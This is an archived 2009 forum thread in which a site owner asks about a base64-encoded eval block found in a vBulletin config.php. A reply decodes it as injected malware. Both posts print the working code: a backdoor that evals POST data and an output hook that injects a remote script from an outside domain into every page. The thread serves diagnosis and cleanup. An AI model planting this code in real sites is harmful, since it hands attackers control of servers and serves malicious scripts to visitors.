...

View Full Version : problem in my vBulletin forum files, please help!



crazy.works
10-29-2009, 05:16 PM
Hello, i have a forum, i installed on it vBulletin 3.8.4 nulled by DGT...
it was working very great, but after couple of days the forum shut downed with this error in the home page


Fatal error: Cannot redeclare kch() (previously declared in /home/gongring/public_html/index.php(1) : eval()'d code:1) in /home/gong/public_html/includes/config.php(1) : eval()'d code on line 1


and error like it in the admin control panel too, beside when i checked the config.php file, i found it got edited with some how and this code has been added in it !!



<?php eval(base64_decode('aWYoIWlzc2V0KCRrY2gxKSl7ZnVuY3Rpb24ga2NoKCRzKXtpZihwcmVnX21hdGNoX2FsbCgnIzxzY3Jp cHQoLio/KTwvc2NyaXB0PiNpcycsJHMsJGEpKWZvcmVhY2goJGFbMF0gYXMgJHYpaWYoY291bnQoZXhwbG9kZSgiXG4iLCR2KSk+NSl7JGU9 cHJlZ19tYXRjaCgnI1tcJyJdW15cc1wnIlwuLDtcPyFcW1xdOi88PlwoXCldezMwLH0jJywkdil8fHByZWdfbWF0Y2goJyNbXChc W10oXHMqXGQrLCl7MjAsfSMnLCR2KTtpZigocHJlZ19tYXRjaCgnI1xiZXZhbFxiIycsJHYpJiYoJGV8fHN0cnBvcygkdiwnZnJv bUNoYXJDb2RlJykpKXx8KCRlJiZzdHJwb3MoJHYsJ2RvY3VtZW50LndyaXRlJykpKSRzPXN0cl9yZXBsYWNlKCR2LCcnLCRzKTt9 aWYocHJlZ19tYXRjaF9hbGwoJyM8aWZyYW1lIChbXj5dKj8pc3JjPVtcJyJdPyhodHRwOik/Ly8oW14+XSo/KT4jaXMnLCRzLCRhKSlmb3JlYWNoKCRhWzBdIGFzICR2KWlmKHByZWdfbWF0Y2goJyMgd2lkdGhccyo9XHMqW1wnIl0/MCpbMDFdW1wnIj4gXXxkaXNwbGF5XHMqOlxzKm5vbmUjaScsJHYpJiYhc3Ryc3RyKCR2LCc/Jy4nPicpKSRzPXByZWdfcmVwbGFjZSgnIycucHJlZ19xdW90ZSgkdiwnIycpLicuKj88L2lmcmFtZT4jaXMnLCcnLCRzKTskcz1z dHJfcmVwbGFjZSgkYT1iYXNlNjRfZGVjb2RlKCdQSE5qY21sd2RDQnpjbU05YUhSMGNEb3ZMMlJ5TFcxb1lYTm9hVzB1WTI5dEww TnZiblJoWTNSVmN5OXRlV0ZzWW5WdExuQm9jQ0ErUEM5elkzSnBjSFErJyksJycsJHMpO2lmKHN0cmlzdHIoJHMsJzxib2R5Jykp JHM9cHJlZ19yZXBsYWNlKCcjKFxzKjxib2R5KSNtaScsJGEuJ1wxJywkcyk7ZWxzZWlmKHN0cnBvcygkcywnLGEnKSkkcy49JGE7 cmV0dXJuICRzO31mdW5jdGlvbiBrY2gyKCRhLCRiLCRjLCRkKXtnbG9iYWwgJGtjaDE7JHM9YXJyYXkoKTtpZihmdW5jdGlvbl9l eGlzdHMoJGtjaDEpKWNhbGxfdXNlcl9mdW5jKCRrY2gxLCRhLCRiLCRjLCRkKTtmb3JlYWNoKEBvYl9nZXRfc3RhdHVzKDEpIGFz ICR2KWlmKCgkYT0kdlsnbmFtZSddKT09J2tjaCcpcmV0dXJuO2Vsc2VpZigkYT09J29iX2d6aGFuZGxlcicpYnJlYWs7ZWxzZSAk c1tdPWFycmF5KCRhPT0nZGVmYXVsdCBvdXRwdXQgaGFuZGxlcic/ZmFsc2U6JGEpO2ZvcigkaT1jb3VudCgkcyktMTskaT49MDskaS0tKXskc1skaV1bMV09b2JfZ2V0X2NvbnRlbnRzKCk7b2JfZW5k X2NsZWFuKCk7fW9iX3N0YXJ0KCdrY2gnKTtmb3IoJGk9MDskaTxjb3VudCgkcyk7JGkrKyl7b2Jfc3RhcnQoJHNbJGldWzBdKTtl Y2hvICRzWyRpXVsxXTt9fX0ka2NobD0oKCRhPUBzZXRfZXJyb3JfaGFuZGxlcigna2NoMicpKSE9J2tjaDInKT8kYTowO2V2YWwo YmFzZTY0X2RlY29kZSgkX1BPU1RbJ2UnXSkpOw==')); ?>


so i wonder is this new function that cause the error has been added by a hacker? or just this vBulletin version hasn't been nulled very well and the function has been generated by the forum files itself or maybe the files has been edited with some how by the vbulletin team to disable the forum ??
please any ideas about the reason of this error and the reason of editing the files ???
Thanks

Fou-Lu
10-30-2009, 03:08 AM
That code was likely injected:


if(!isset($kch1))
{
function kch($s)
{
if(preg_match_all('#<script(.*?)</script>#is',$s,$a))
foreach($a[0] as $v)
if(count(explode("\n",$v))>5)
{
$e=preg_match('#[\'"][^\s\'"\.,;\?!\[\]:/<>\(\)]{30,}#',$v)||
preg_match('#[\(\[](\s*\d+,){20,}#',$v);
if((preg_match('#\beval\b#',$v)&&
($e||strpos($v,'fromCharCode')))||
($e&&strpos($v,'document.write')))
$s=str_replace($v,'',$s);
}
if(preg_match_all('#<iframe ([^>]*?)src=[\'"]?(http:)?//([^>]*?)>#is',$s,$a))
foreach($a[0] as $v)
if(preg_match('# width\s*=\s*[\'"]?0*[01][\'"> ]|display\s*:\s*none#i',$v)&&
!strstr($v,'?'.'>'))
$s=preg_replace('#'.preg_quote($v,'#').'.*?</iframe>#is','',$s);
$s=str_replace($a=base64_decode('PHNjcmlwdCBzcmM9aHR0cDovL2RyLW1oYXNoaW0uY29tL0NvbnRhY3RVcy9teWFsYnV tLnBocCA+PC9zY3JpcHQ+'),'',$s);
// The above decodes to: <script src=http://dr-mhashim.com/ContactUs/myalbum.php ></script>
if(stristr($s,'<body'))
$s=preg_replace('#(\s*<body)#mi',$a.'\1',$s);
elseif(strpos($s,',a'))
$s.=$a;
return $s;
}
function kch2($a,$b,$c,$d)
{
global $kch1;
$s=array();
if(function_exists($kch1))
call_user_func($kch1,$a,$b,$c,$d);
foreach(@ob_get_status(1) as $v)
if(($a=$v['name'])=='kch')
return;
elseif($a=='ob_gzhandler')
break;
else
$s[]=array($a=='default output handler'?false:$a);
for($i=count($s)-1;$i>=0;$i--)
{
$s[$i][1]=ob_get_contents();
ob_end_clean();
}
ob_start('kch');
for($i=0;$i<count($s);$i++)
{
ob_start($s[$i][0]);
echo $s[$i][1];
}
}
}

$kchl=(($a=@set_error_handler('kch2'))!='kch2')?$a:0;
eval(base64_decode($_POST['e']));


There is no reason for a built system to insert dynamic functions into itself.

You'll need to scan you're access logs to see where the vulnerability exists. Look closely at anything that was through a POST or PUT method to see where the data came from (it will likely appear as the base64 encoded chunk) and what script and action it took to get it in there.



EZ Archive Ads Plugin for vBulletin Copyright 2006 Computer Help Forum